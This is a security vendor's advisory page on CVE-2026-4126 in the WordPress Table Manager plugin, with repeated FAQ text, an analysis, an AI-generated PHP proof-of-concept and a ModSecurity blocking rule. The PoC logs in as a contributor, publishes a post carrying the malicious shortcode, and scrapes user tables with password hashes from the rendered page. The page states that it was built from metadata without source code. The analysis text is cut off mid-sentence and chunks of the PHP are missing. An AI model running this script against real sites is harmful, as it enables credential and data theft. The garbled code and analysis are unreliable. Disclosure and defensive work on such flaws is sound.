What is CVE-2026-4126?

CVE-2026-4126 is a vulnerability in the Table Manager plugin for WordPress that allows authenticated users with Contributor-level access or higher to expose sensitive information from arbitrary database tables. This occurs through the use of a user-controlled ‘table’ attribute in the ‘table_manager’ shortcode.

How does the vulnerability work?

The vulnerability arises because the ‘table_manager’ shortcode does not properly validate the ‘table’ attribute provided by users. It only sanitizes the input using ‘sanitize_key()’ and then directly queries the database using this input, allowing attackers to access sensitive data from any table in the WordPress database.

Who is affected by this vulnerability?

Any WordPress site using the Table Manager plugin version 1.0.0 or earlier is affected. Specifically, users with Contributor-level access and above can exploit this vulnerability by embedding the malicious shortcode in posts or pages.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify if you are using the Table Manager plugin version 1.0.0 or earlier. Additionally, review your posts and pages for any occurrences of the ‘table_manager’ shortcode that may be improperly configured.

What are the potential risks of this vulnerability?

The potential risks include exposure of sensitive data such as user credentials, session tokens, and private post content. Although the CVSS score is 4.3, indicating a medium severity, the actual risk is significant due to the possibility of exposing hashed passwords that can be cracked offline.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the Table Manager plugin to the latest version that addresses this issue. Additionally, you can implement an allowlist check for the ‘table’ attribute in the shortcode handler to ensure only authorized tables are accessed.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the Table Manager plugin to prevent exploitation. You may also restrict access to the WordPress admin area to limit who can create posts with the vulnerable shortcode.

What does the CVSS score of 4.3 indicate?

The CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability requires authenticated access to exploit, the potential impact on confidentiality can be significant due to the exposure of sensitive data.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can create a post containing the shortcode [table_manager table=’users’], which would execute a SELECT query on the wp_users table. This allows the attacker to retrieve and display sensitive user data on the frontend.

How can I implement a security rule to block this vulnerability?

You can implement a ModSecurity rule to block exploitation attempts by detecting the ‘table’ parameter in post content. The rule should deny requests that attempt to access non-plugin tables and can be configured to return a 403 Forbidden status.

What is the role of the 'tablemanager_created_tables' option?

The ‘tablemanager_created_tables’ option is intended to maintain a list of tables that the Table Manager plugin is allowed to access. However, this option is only checked in admin functions and not in the shortcode handler, which is the root cause of the vulnerability.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 23, 2026

CVE-2026-4126: Table Manager <= 1.0.0 – Authenticated (Contributor+) Sensitive Information Exposure via 'table' Shortcode Attribute (table-manager)

CVE ID CVE-2026-4126

Plugin table-manager

Severity Medium (CVSS 4.3)

CWE 200

Vulnerable Version 1.0.0

Patched Version —

Disclosed April 20, 2026

Analysis Overview

“`json
{
“analysis”: “Atomic Edge analysis of CVE-2026-4126 (metadata-based): This vulnerability in the Table Manager plugin (prefix. The code then runs DESC and SELECT * queries on this arbitrary table name, rendering all results to the frontend. The plugin maintains a list of allowed tables in the ‘tablemanager_created_tables’ option, but this option is only checked in admin functions, never in the shortcode handler. Atomic Edge research confirms this is the root cause based on the explicit description of the vulnerability, though no source code was available for verification.nnExploitation: An attacker with Contributor-level access or higher creates a post or page containing the shortcode [table_manager table=”{target_table}”] where {target_table} is the name of a WordPress core or plugin table (without the prefix). For example, [table_manager table=”users”] would query wp_users and display all user data including hashed passwords. Any authenticated user with the ‘edit_posts’ capability can inject this shortcode into content. The shortcode is processed during page rendering, causing the plugin to execute DESC wp_users and SELECT * FROM wp_users, outputting the entire contents to the frontend HTML. The attacker simply visits the page containing the malicious shortcode to see the exposed data.nnRemediation: The fix requires adding an allowlist check in the shortcode handler. Before executing any query, the plugin must retrieve the ‘tablemanager_created_tables’ option and verify that the user-supplied table name (after prepending the prefix) exists in that list. Alternatively, the plugin could join with the options table to validate. The fix should also include a capability check (though Contributor+ is a reasonable baseline) and should not expose raw database results to unauthenticated users. Patching requires updating the tablemanager_render_table_shortcode() function to reject any table not in the plugin’s registry.nnImpact: Successful exploitation exposes sensitive data from any WordPress database table. This includes user credentials (hashed passwords from wp_users), session tokens, API keys stored in wp_options, post content including private/draft posts, and any plugin-specific sensitive data. While the CVSS score is 4.3 (Medium) due to the Contributor+ requirement and low confidentiality impact assessment, the actual risk is higher as it can expose password hashes that may be cracked offline, leading to privilege escalation.”,
“poc_php”: “// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-4126 – Table Manager true,n CURLOPT_POSTFIELDS => http_build_query([n ‘log’ => $username,n ‘pwd’ => $password,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’,n ‘testcookie’ => 1n ]),n CURLOPT_RETURNTRANSFER => true,n CURLOPT_COOKIEJAR => ‘/tmp/cve-2026-4126-cookies.txt’,n CURLOPT_FOLLOWLOCATION => false,n CURLOPT_HEADER => truen]);n$response = curl_exec($ch);ncurl_close($ch);nn// Step 2: Get wp-admin page to extract nonce for post creationn$admin_url = $target_url . ‘/wp-admin/post-new.php’;n$ch = curl_init($admin_url);ncurl_setopt_array($ch, [n CURLOPT_RETURNTRANSFER => true,n CURLOPT_COOKIEFILE => ‘/tmp/cve-2026-4126-cookies.txt’,n CURLOPT_HEADER => truen]);n$response = curl_exec($ch);ncurl_close($ch);nn// Extract nonce from responsenpreg_match(‘/name=”_wpnonce” value=”([a-f0-9]+)”/’, $response, $matches);n$nonce = $matches[1] ?? ”;nn// Step 3: Create a new post with the malicious shortcoden// The shortcode [table_manager table=”users”] will render wp_users table contentsn$post_data = [n ‘post_title’ => ‘Table Exposure PoC’,n ‘post_content’ => ‘[table_manager table=”users”]’,n ‘post_status’ => ‘publish’,n ‘post_type’ => ‘post’,n ‘_wpnonce’ => $nonce,n ‘action’ => ‘editpost’n];nn$post_url = $target_url . ‘/wp-admin/post.php’;n$ch = curl_init($post_url);ncurl_setopt_array($ch, [n CURLOPT_POST => true,n CURLOPT_POSTFIELDS => http_build_query($post_data),n CURLOPT_RETURNTRANSFER => true,n CURLOPT_COOKIEFILE => ‘/tmp/cve-2026-4126-cookies.txt’,n CURLOPT_FOLLOWLOCATION => true,n CURLOPT_HEADER => truen]);n$response = curl_exec($ch);n$post_id = 0;nif (preg_match(‘/post=([0-9]+)/’, curl_getinfo($ch, CURLINFO_EFFECTIVE_URL), $m)) {n $post_id = (int)$m[1];n}ncurl_close($ch);nn// Step 4: Retrieve the published post to see the exposed datanif ($post_id) {n $view_url = $target_url . ‘/?p=’ . $post_id;n $ch = curl_init($view_url);n curl_setopt_array($ch, [n CURLOPT_RETURNTRANSFER => true,n CURLOPT_COOKIEFILE => ‘/tmp/cve-2026-4126-cookies.txt’n ]);n $content = curl_exec($ch);n curl_close($ch);n n // Extract and display the table data (user credentials exposed)n // The plugin renders DESC first, then SELECT * – look for table outputn echo “Exploited! Exposed data:\n”;n if (preg_match_all(‘/

]*>([^<]+)/’, $content, $cells)) {n echo “Found ” . count($cells[1]) . ” cells of database output.\n”;n echo “First 30 cells (likely user table column headers and data):\n”;n for ($i = 0; $i < min(30, count($cells[1])); $i++) {n echo " [" . $i . "] " . html_entity_decode($cells[1][$i]) . "\n";n }n } else {n echo "No table data extracted. Check if shortcode was processed or post is visible.\n";n }n} else {n echo "Failed to create post.\n";n}nn// Cleanupnecho "\nPoC complete. To test other tables, change users to options, postmeta, etc.\n";n",
"modsecurity_rule": "{n "analysis": "# Atomic Edge WAF Rule – CVE-2026-4126 (metadata-based)\n# This rule blocks the Table Manager shortcode exploitation by detecting the 'table' parameter\n# in post content that attempts to access non-plugin tables (like 'users', 'options', etc.)\n\nSecRule REQUEST_URI \"@contains /wp-admin/post.php\" \n \"id:20264126,phase:2,deny,status:403,chain,msg:'CVE-2026-4126 Table Manager malicious shortcode table parameter',severity:'CRITICAL',tag:'CVE-2026-4126'\"\n SecRule ARGS_POST:post_content \"@rx \\[table_manager\\s+table=[\\\"\\']?(?!.*(?:tablemanager_))[a-z0-9_]+[\\\"\\']?\\]\" \"chain\"\n SecRule ARGS_POST:post_status \"@streq publish\" \"t:none\"\n"n}
“`

Frequently Asked Questions

What is CVE-2026-4126?
Overview of the vulnerability
CVE-2026-4126 is a vulnerability in the Table Manager plugin for WordPress that allows authenticated users with Contributor-level access or higher to expose sensitive information from arbitrary database tables. This occurs through the use of a user-controlled ‘table’ attribute in the ‘table_manager’ shortcode.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises because the ‘table_manager’ shortcode does not properly validate the ‘table’ attribute provided by users. It only sanitizes the input using ‘sanitize_key()’ and then directly queries the database using this input, allowing attackers to access sensitive data from any table in the WordPress database.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the Table Manager plugin version 1.0.0 or earlier is affected. Specifically, users with Contributor-level access and above can exploit this vulnerability by embedding the malicious shortcode in posts or pages.
How can I check if my site is vulnerable?
Verification steps
To check if your site is vulnerable, verify if you are using the Table Manager plugin version 1.0.0 or earlier. Additionally, review your posts and pages for any occurrences of the ‘table_manager’ shortcode that may be improperly configured.
What are the potential risks of this vulnerability?
Understanding the impact
The potential risks include exposure of sensitive data such as user credentials, session tokens, and private post content. Although the CVSS score is 4.3, indicating a medium severity, the actual risk is significant due to the possibility of exposing hashed passwords that can be cracked offline.
How can I mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Table Manager plugin to the latest version that addresses this issue. Additionally, you can implement an allowlist check for the ‘table’ attribute in the shortcode handler to ensure only authorized tables are accessed.
What should I do if I cannot update the plugin immediately?
Temporary measures
If you cannot update the plugin immediately, consider disabling the Table Manager plugin to prevent exploitation. You may also restrict access to the WordPress admin area to limit who can create posts with the vulnerable shortcode.
What does the CVSS score of 4.3 indicate?
Understanding severity ratings
The CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability requires authenticated access to exploit, the potential impact on confidentiality can be significant due to the exposure of sensitive data.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an attacker can create a post containing the shortcode [table_manager table=’users’], which would execute a SELECT query on the wp_users table. This allows the attacker to retrieve and display sensitive user data on the frontend.
How can I implement a security rule to block this vulnerability?
Using ModSecurity
You can implement a ModSecurity rule to block exploitation attempts by detecting the ‘table’ parameter in post content. The rule should deny requests that attempt to access non-plugin tables and can be configured to return a 403 Forbidden status.
What is the role of the 'tablemanager_created_tables' option?
Functionality and importance
The ‘tablemanager_created_tables’ option is intended to maintain a list of tables that the Table Manager plugin is allowed to access. However, this option is only checked in admin functions and not in the shortcode handler, which is the root cause of the vulnerability.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations